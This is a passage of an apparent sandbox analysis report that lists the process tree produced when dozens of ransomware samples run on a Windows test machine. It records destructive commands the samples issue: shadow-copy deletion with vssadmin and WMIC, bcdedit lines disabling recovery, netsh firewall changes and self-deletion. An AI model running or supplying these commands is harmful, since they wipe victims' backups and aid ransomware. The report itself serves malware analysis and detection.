                HEUR-Trojan-Ransom.Win32.Agent.gen-ea76af7afb2f8219cbc1c470dafa757334a5df04eec25740b88968abe1365432.exe
                3⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1796
            • C:\Users\Admin\Desktop\00291\HEUR-Trojan-Ransom.Win32.Generic-aa77d1c84fd78533d137c5642da8331b0021fe366519cfdb13117b11a433c8d8.exe
              HEUR-Trojan-Ransom.Win32.Generic-aa77d1c84fd78533d137c5642da8331b0021fe366519cfdb13117b11a433c8d8.exe
              2⤵
              • Executes dropped EXE
              • Maps connected drives based on registry
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: CmdExeWriteProcessMemorySpam
              • Suspicious behavior: MapViewOfSection
              PID:1280
              • C:\Users\Admin\Desktop\00291\HEUR-Trojan-Ransom.Win32.Generic-aa77d1c84fd78533d137c5642da8331b0021fe366519cfdb13117b11a433c8d8.exe
                HEUR-Trojan-Ransom.Win32.Generic-aa77d1c84fd78533d137c5642da8331b0021fe366519cfdb13117b11a433c8d8.exe
                3⤵
                  PID:3148
              • C:\Users\Admin\Desktop\00291\HEUR-Trojan-Ransom.Win32.Shade.gen-a0e7283263c1e89537b54a14e065a331749285f8b7fe60488d360bf7c796aa0a.exe
                HEUR-Trojan-Ransom.Win32.Shade.gen-a0e7283263c1e89537b54a14e065a331749285f8b7fe60488d360bf7c796aa0a.exe
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                • Suspicious use of FindShellTrayWindow
                PID:632
              • C:\Users\Admin\Desktop\00291\HEUR-Trojan-Ransom.Win32.Zerber.gen-a0e0728d5a6e11259b0c4f167110765d06619b0a1fd6af91c8dcd64825301d99.exe
                HEUR-Trojan-Ransom.Win32.Zerber.gen-a0e0728d5a6e11259b0c4f167110765d06619b0a1fd6af91c8dcd64825301d99.exe
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                • Suspicious behavior: MapViewOfSection
                PID:1608
                • C:\Users\Admin\Desktop\00291\HEUR-Trojan-Ransom.Win32.Zerber.gen-a0e0728d5a6e11259b0c4f167110765d06619b0a1fd6af91c8dcd64825301d99.exe
                  HEUR-Trojan-Ransom.Win32.Zerber.gen-a0e0728d5a6e11259b0c4f167110765d06619b0a1fd6af91c8dcd64825301d99.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2220
              • C:\Users\Admin\Desktop\00291\HEUR-Trojan-Ransom.Win32.Zerber.pef-0eff1fb1a0c9d0dc59cf909f1f931756e57e9af39a844340b247c69fc971b614.exe
                HEUR-Trojan-Ransom.Win32.Zerber.pef-0eff1fb1a0c9d0dc59cf909f1f931756e57e9af39a844340b247c69fc971b614.exe
                2⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:316
              • C:\Users\Admin\Desktop\00291\HEUR-Trojan-Ransom.Win32.Zerber.vho-a977765a568fbabd5b00635cb7d58863154c32b50dce5a78e23428a5f721932a.exe
                HEUR-Trojan-Ransom.Win32.Zerber.vho-a977765a568fbabd5b00635cb7d58863154c32b50dce5a78e23428a5f721932a.exe
                2⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:1936
              • C:\Users\Admin\Desktop\00291\Trojan-Ransom.NSIS.Xamyh.bht-f5c1cf1fe163407041a3225b9eda09d1ef44faf3d35a4f87a7bf6c7a86a74ba9.exe
                Trojan-Ransom.NSIS.Xamyh.bht-f5c1cf1fe163407041a3225b9eda09d1ef44faf3d35a4f87a7bf6c7a86a74ba9.exe
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:2984
                • C:\Users\Admin\Desktop\00291\Trojan-Ransom.NSIS.Xamyh.bht-f5c1cf1fe163407041a3225b9eda09d1ef44faf3d35a4f87a7bf6c7a86a74ba9.exe
                  Trojan-Ransom.NSIS.Xamyh.bht-f5c1cf1fe163407041a3225b9eda09d1ef44faf3d35a4f87a7bf6c7a86a74ba9.exe
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2952
              • C:\Users\Admin\Desktop\00291\Trojan-Ransom.NSIS.Zerber.fp-21211882310a506c89dd373e6aa8e6ac0802cefb7116879c0737fc1de7ed2726.exe
                Trojan-Ransom.NSIS.Zerber.fp-21211882310a506c89dd373e6aa8e6ac0802cefb7116879c0737fc1de7ed2726.exe
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:3012
                • C:\Users\Admin\Desktop\00291\Trojan-Ransom.NSIS.Zerber.fp-21211882310a506c89dd373e6aa8e6ac0802cefb7116879c0737fc1de7ed2726.exe
                  Trojan-Ransom.NSIS.Zerber.fp-21211882310a506c89dd373e6aa8e6ac0802cefb7116879c0737fc1de7ed2726.exe
                  3⤵
                    PID:3352
                • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Agent.iyo-4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79.exe
                  Trojan-Ransom.Win32.Agent.iyo-4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79.exe
                  2⤵
                  • Executes dropped EXE
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  PID:2728
                • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Bitman.ixe-8c04de81a783137b2d326d6b7ab68b758c1ecccd9a6ca8e524b1de7f40566e5f.exe
                  Trojan-Ransom.Win32.Bitman.ixe-8c04de81a783137b2d326d6b7ab68b758c1ecccd9a6ca8e524b1de7f40566e5f.exe
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  • Suspicious use of SetWindowsHookEx
                  PID:2188
                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Bitman.ixe-8c04de81a783137b2d326d6b7ab68b758c1ecccd9a6ca8e524b1de7f40566e5f.exe
                    Trojan-Ransom.Win32.Bitman.ixe-8c04de81a783137b2d326d6b7ab68b758c1ecccd9a6ca8e524b1de7f40566e5f.exe
                    3⤵
                    • Drops file in Windows directory
                    • System Location Discovery: System Language Discovery
                    PID:3916
                    • C:\Windows\sqmvinsiq.exe
                      C:\Windows\sqmvinsiq.exe
                      4⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of SetWindowsHookEx
                      PID:2296
                      • C:\Windows\sqmvinsiq.exe
                        C:\Windows\sqmvinsiq.exe
                        5⤵
                          PID:3488
                          • C:\Users\Admin\Documents\iefqv.exe
                            C:\Users\Admin\Documents\iefqv.exe
                            6⤵
                              PID:4296
                              • C:\Windows\System32\vssadmin.exe
                                "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
                                7⤵
                                • Interacts with shadow copies
                                PID:4340
                            • C:\Windows\SysWOW64\NOTEPAD.EXE
                              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_H_e_l_p_RECOVER_INSTRUCTIONS.TXT
                              6⤵
                              • Opens file in notepad (likely ransom note)
                              PID:5536
                            • C:\Users\Admin\Documents\pkher.exe
                              C:\Users\Admin\Documents\pkher.exe
                              6⤵
                                PID:6264
                                • C:\Windows\System32\vssadmin.exe
                                  "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
                                  7⤵
                                  • Interacts with shadow copies
                                  PID:6852
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c DEL C:\Windows\SQMVIN~1.EXE
                                6⤵
                                  PID:5364
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00291\TROJAN~4.EXE
                              4⤵
                                PID:3248
                          • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Bitman.lff-69db3826b8c5a29da243c6346d3cb29a2dd6773061bad375858ed8be9921c75f.exe
                            Trojan-Ransom.Win32.Bitman.lff-69db3826b8c5a29da243c6346d3cb29a2dd6773061bad375858ed8be9921c75f.exe
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            PID:2216
                            • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Bitman.lff-69db3826b8c5a29da243c6346d3cb29a2dd6773061bad375858ed8be9921c75f.exe
                              Trojan-Ransom.Win32.Bitman.lff-69db3826b8c5a29da243c6346d3cb29a2dd6773061bad375858ed8be9921c75f.exe
                              3⤵
                              • Drops file in Windows directory
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2900
                              • C:\Windows\eqisnckqgbrf.exe
                                C:\Windows\eqisnckqgbrf.exe
                                4⤵
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                PID:4076
                                • C:\Windows\eqisnckqgbrf.exe
                                  C:\Windows\eqisnckqgbrf.exe
                                  5⤵
                                  • Adds Run key to start application
                                  • Drops file in Program Files directory
                                  • System Location Discovery: System Language Discovery
                                  • System policy modification
                                  PID:3112
                                  • C:\Windows\System32\wbem\WMIC.exe
                                    "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
                                    6⤵
                                      PID:4016
                                    • C:\Windows\SysWOW64\NOTEPAD.EXE
                                      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RECOVERY.TXT
                                      6⤵
                                      • Opens file in notepad (likely ransom note)
                                      PID:2112
                                    • C:\Windows\System32\wbem\WMIC.exe
                                      "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
                                      6⤵
                                        PID:6288
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /c DEL C:\Windows\EQISNC~1.EXE
                                        6⤵
                                          PID:3876
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00291\TR583C~1.EXE
                                      4⤵
                                        PID:3184
                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Bitman.mso-a696330849345378e216dfd3588981c5113dc8478301f4de6a0aecc6c12f64ab.exe
                                    Trojan-Ransom.Win32.Bitman.mso-a696330849345378e216dfd3588981c5113dc8478301f4de6a0aecc6c12f64ab.exe
                                    2⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    PID:2172
                                    • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Bitman.mso-a696330849345378e216dfd3588981c5113dc8478301f4de6a0aecc6c12f64ab.exe
                                      Trojan-Ransom.Win32.Bitman.mso-a696330849345378e216dfd3588981c5113dc8478301f4de6a0aecc6c12f64ab.exe
                                      3⤵
                                      • Drops file in Windows directory
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2364
                                      • C:\Windows\tkupdnxwwkky.exe
                                        C:\Windows\tkupdnxwwkky.exe
                                        4⤵
                                        • Suspicious use of SetThreadContext
                                        • System Location Discovery: System Language Discovery
                                        PID:3624
                                        • C:\Windows\tkupdnxwwkky.exe
                                          C:\Windows\tkupdnxwwkky.exe
                                          5⤵
                                          • Adds Run key to start application
                                          • Drops file in Program Files directory
                                          • System Location Discovery: System Language Discovery
                                          • System policy modification
                                          PID:4060
                                          • C:\Windows\System32\wbem\WMIC.exe
                                            "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
                                            6⤵
                                              PID:960
                                            • C:\Windows\SysWOW64\NOTEPAD.EXE
                                              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RECOVERY.TXT
                                              6⤵
                                              • Opens file in notepad (likely ransom note)
                                              PID:5756
                                            • C:\Windows\System32\wbem\WMIC.exe
                                              "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
                                              6⤵
                                                PID:6768
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\system32\cmd.exe" /c DEL C:\Windows\TKUPDN~1.EXE
                                                6⤵
                                                  PID:7652
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00291\TRD4A4~1.EXE
                                              4⤵
                                                PID:3764
                                          • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Bitman.ovx-b21630178f1dd4177e63e9a1225f85531fcbedff032f792fddfeee5004339d6f.exe
                                            Trojan-Ransom.Win32.Bitman.ovx-b21630178f1dd4177e63e9a1225f85531fcbedff032f792fddfeee5004339d6f.exe
                                            2⤵
                                            • Executes dropped EXE
                                            • Drops file in Windows directory
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2148
                                            • C:\Windows\pgoqahqwnyof.exe
                                              C:\Windows\pgoqahqwnyof.exe
                                              3⤵
                                              • Executes dropped EXE
                                              • Adds Run key to start application
                                              • Drops file in Program Files directory
                                              • Suspicious use of AdjustPrivilegeToken
                                              • System policy modification
                                              PID:1704
                                              • C:\Windows\System32\wbem\WMIC.exe
                                                "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
                                                4⤵
                                                  PID:3528
                                                • C:\Windows\SysWOW64\NOTEPAD.EXE
                                                  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_ReCoVeRy_.TXT
                                                  4⤵
                                                  • Opens file in notepad (likely ransom note)
                                                  PID:4108
                                                • C:\Windows\System32\wbem\WMIC.exe
                                                  "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
                                                  4⤵
                                                    PID:5284
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\system32\cmd.exe" /c DEL C:\Windows\PGOQAH~1.EXE
                                                    4⤵
                                                      PID:5400
                                                      • C:\Users\Admin\AppData\Roaming\{C7CD5A05-A6B9-B06B-3FDB-EB4CCFC45048}\verifier.exe
                                                        "C:\Users\Admin\AppData\Roaming\{C7CD5A05-A6B9-B06B-3FDB-EB4CCFC45048}\verifier.exe"
                                                        5⤵
                                                          PID:8452
                                                          • C:\Windows\system32\vssadmin.exe
                                                            "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
                                                            6⤵
                                                            • Interacts with shadow copies
                                                            PID:8428
                                                          • C:\Windows\system32\wbem\wmic.exe
                                                            "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
                                                            6⤵
                                                              PID:1600
                                                            • C:\Windows\System32\bcdedit.exe
                                                              "C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
                                                              6⤵
                                                              • Modifies boot configuration data using bcdedit
                                                              PID:3452
                                                            • C:\Windows\System32\bcdedit.exe
                                                              "C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
                                                              6⤵
                                                              • Modifies boot configuration data using bcdedit
                                                              PID:3364
                                                            • C:\Windows\system32\NOTEPAD.EXE
                                                              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\# DECRYPT MY FILES #.txt
                                                              6⤵
                                                                PID:7492
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00291\TR8AC0~1.EXE
                                                          3⤵
                                                            PID:2884
                                                        • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Blocker.kaud-2f194938918b5bd0737898b876add7101507eb346dfeffbd5d63c9279f285555.exe
                                                          Trojan-Ransom.Win32.Blocker.kaud-2f194938918b5bd0737898b876add7101507eb346dfeffbd5d63c9279f285555.exe
                                                          2⤵
                                                          • Windows security bypass
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Windows security modification
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                          PID:2156
                                                          • C:\Users\Admin\AppData\Roaming\alFSVWJB\fdzivafvd.exe
                                                            C:\Users\Admin\AppData\Roaming\alFSVWJB\fdzivafvd.exe
                                                            3⤵
                                                              PID:3240
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                /a /c netsh advfirewall firewall add rule name="alFSVWJB" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\alFSVWJB\FDZIVA~1.EXE"
                                                                4⤵
                                                                  PID:7320
                                                                • C:\Users\Admin\AppData\Roaming\alFSVWJB\fdzivafvd.exe
                                                                  "C:\Users\Admin\AppData\Roaming\alFSVWJB\fdzivafvd.exe"
                                                                  4⤵
                                                                    PID:3552
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  /a /c ping 127.0.0.1 -n 3&del "C:\Users\Admin\Desktop\00291\TR7796~1.EXE"
                                                                  3⤵
                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                  PID:3688
                                                              • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Crusis.vd-9a5a08d7a4579e11f59594fe053c8157c20ab74a7775a11a1aa6154a3eb6744a.exe
                                                                Trojan-Ransom.Win32.Crusis.vd-9a5a08d7a4579e11f59594fe053c8157c20ab74a7775a11a1aa6154a3eb6744a.exe
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                PID:3068
                                                                • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Crusis.vd-9a5a08d7a4579e11f59594fe053c8157c20ab74a7775a11a1aa6154a3eb6744a.exe
                                                                  C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Crusis.vd-9a5a08d7a4579e11f59594fe053c8157c20ab74a7775a11a1aa6154a3eb6744a.exe
                                                                  3⤵
                                                                  • Drops startup file
                                                                  • Executes dropped EXE
                                                                  • Drops file in System32 directory
                                                                  • Sets desktop wallpaper using registry
                                                                  • Drops file in Windows directory
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2888
                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                    C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
                                                                    4⤵
                                                                    • Modifies Windows Firewall
                                                                    PID:1448
                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                    C:\Windows\system32\netsh.exe advfirewall reset
                                                                    4⤵
                                                                    • Modifies Windows Firewall
                                                                    PID:2996
                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_READ_THI$_FILE_T35G_.hta"
                                                                    4⤵
                                                                      PID:1852
                                                                    • C:\Windows\SysWOW64\NOTEPAD.EXE
                                                                      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_READ_THI$_FILE_5Y34CIV_.txt
                                                                      4⤵
                                                                        PID:3360
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\system32\cmd.exe"
                                                                        4⤵
                                                                          PID:6596
                                                                    • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.CryptXXX.asdgco-3c8ac670d8c920170dd431a5a08cbefd62a98e369eb552acbc04a0eeb2f2a198.exe
                                                                      Trojan-Ransom.Win32.CryptXXX.asdgco-3c8ac670d8c920170dd431a5a08cbefd62a98e369eb552acbc04a0eeb2f2a198.exe
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:1528
                                                                    • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Foreign.flts-e15f77021c20cdb4f5d358941acaaaf80973fae74038b34980464a44b0b86653.exe
                                                                      Trojan-Ransom.Win32.Foreign.flts-e15f77021c20cdb4f5d358941acaaaf80973fae74038b34980464a44b0b86653.exe
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                      • Suspicious behavior: MapViewOfSection
                                                                      PID:1432
                                                                    • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Foreign.gthl-7524b52fa8d2c71d090506aa1f0d37636793749499fd7e3e567aa69dba0274e5.exe
                                                                      Trojan-Ransom.Win32.Foreign.gthl-7524b52fa8d2c71d090506aa1f0d37636793749499fd7e3e567aa69dba0274e5.exe
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                      • Suspicious behavior: MapViewOfSection
                                                                      PID:2340
                                                                    • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Foreign.ltge-5696c2ba65833ee91b844858b0c9d43d2fd997d5131d2c4ce549e7aab842eaa3.exe
                                                                      Trojan-Ransom.Win32.Foreign.ltge-5696c2ba65833ee91b844858b0c9d43d2fd997d5131d2c4ce549e7aab842eaa3.exe
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Adds Run key to start application
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:320
                                                                      • C:\Users\Admin\AppData\Local\WBUT\winlogonupdater.exe
                                                                        "C:\Users\Admin\AppData\Local\WBUT\winlogonupdater.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:1448
                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                          "C:\Windows\System32\netsh.exe" firewall add allowedprogram "C:\Users\Admin\AppData\Local\WBUT\winlogonupdater.exe" "Update Bluetooth Support Service" ENABLE
                                                                          4⤵
                                                                          • Modifies Windows Firewall
                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                          PID:2292
                                                                    • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Foreign.nisu-e90de45553e1c7cc29fcd8368abefbd3133d469df34d4cf82ea119a5cf932557.exe
                                                                      Trojan-Ransom.Win32.Foreign.nisu-e90de45553e1c7cc29fcd8368abefbd3133d469df34d4cf82ea119a5cf932557.exe
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Suspicious use of SetThreadContext
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                      • Suspicious behavior: MapViewOfSection
                                                                      PID:1996
                                                                      • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Foreign.nisu-e90de45553e1c7cc29fcd8368abefbd3133d469df34d4cf82ea119a5cf932557.exe
                                                                        Trojan-Ransom.Win32.Foreign.nisu-e90de45553e1c7cc29fcd8368abefbd3133d469df34d4cf82ea119a5cf932557.exe
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Adds Run key to start application
                                                                        PID:1668
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\CE68\E734.bat" "C:\Users\Admin\AppData\Roaming\MICROS~1\Comrenum\C_G1ring.exe" "C:\Users\Admin\Desktop\00291\TRBA7F~1.EXE""
                                                                          4⤵
                                                                            PID:3068
                                                                      • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Locky.ai-7d69f3934be22a9bdcf0e20059d6c0a851218abe9aa07b83795c54e696be6142.exe
                                                                        Trojan-Ransom.Win32.Locky.ai-7d69f3934be22a9bdcf0e20059d6c0a851218abe9aa07b83795c54e696be6142.exe
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                        PID:836
                                                                        • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\svchost.exe
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:2252
                                                                        • C:\Windows\system32\cmd.exe
                                                                          cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sys73F8.tmp"
                                                                          3⤵
                                                                            PID:1592
                                                                        • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Locky.bil-ada2164654315680132754a7063d2b94428d9101f302ff2a90dba6ab8ebd82b9.exe
                                                                          Trojan-Ransom.Win32.Locky.bil-ada2164654315680132754a7063d2b94428d9101f302ff2a90dba6ab8ebd82b9.exe
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                          PID:1376
                                                                        • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Locky.ex-891c9e5f09c94e1dd4ca1eed54c828a9c0f84c9ccfdede6856fa507d684a1293.exe
                                                                          Trojan-Ransom.Win32.Locky.ex-891c9e5f09c94e1dd4ca1eed54c828a9c0f84c9ccfdede6856fa507d684a1293.exe
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                          PID:1532
                                                                        • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Locky.xer-f38904e8444cea55342760c688a40f78478bfee89462a6a0675c01870388956b.exe
                                                                          Trojan-Ransom.Win32.Locky.xer-f38904e8444cea55342760c688a40f78478bfee89462a6a0675c01870388956b.exe
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Sets desktop wallpaper using registry
                                                                          • Modifies Control Panel
                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          • Suspicious use of SendNotifyMessage
                                                                          PID:2464
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sysAFCF.tmp"
                                                                            3⤵
                                                                              PID:3688
                                                                          • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Locky.xov-85f2b584251421b7ff98b80739bbacb1ace3fd48b2f1e039733de9c06fd733b6.exe
                                                                            Trojan-Ransom.Win32.Locky.xov-85f2b584251421b7ff98b80739bbacb1ace3fd48b2f1e039733de9c06fd733b6.exe
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Modifies system certificate store
                                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            • Suspicious use of SendNotifyMessage
                                                                            PID:1124
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sysBEFC.tmp"
                                                                              3⤵
                                                                                PID:8348
                                                                            • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Purga.p-bdb4d7bc6e0d28bf50a77d01489b44c67ad858874b456add8bd8caf1db53f9c1.exe
                                                                              Trojan-Ransom.Win32.Purga.p-bdb4d7bc6e0d28bf50a77d01489b44c67ad858874b456add8bd8caf1db53f9c1.exe
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of SetThreadContext
                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:2488
                                                                              • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Purga.p-bdb4d7bc6e0d28bf50a77d01489b44c67ad858874b456add8bd8caf1db53f9c1.exe
                                                                                Trojan-Ransom.Win32.Purga.p-bdb4d7bc6e0d28bf50a77d01489b44c67ad858874b456add8bd8caf1db53f9c1.exe
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:1576
                                                                            • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Purgen.cz-5a721cdb14a1be01e656299875238666aec2d7c74d4012a6170b67d130e55168.exe
                                                                              Trojan-Ransom.Win32.Purgen.cz-5a721cdb14a1be01e656299875238666aec2d7c74d4012a6170b67d130e55168.exe
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                              PID:1256
                                                                              • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Purgen.cz-5a721cdb14a1be01e656299875238666aec2d7c74d4012a6170b67d130e55168.exe
                                                                                Trojan-Ransom.Win32.Purgen.cz-5a721cdb14a1be01e656299875238666aec2d7c74d4012a6170b67d130e55168.exe
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:2168
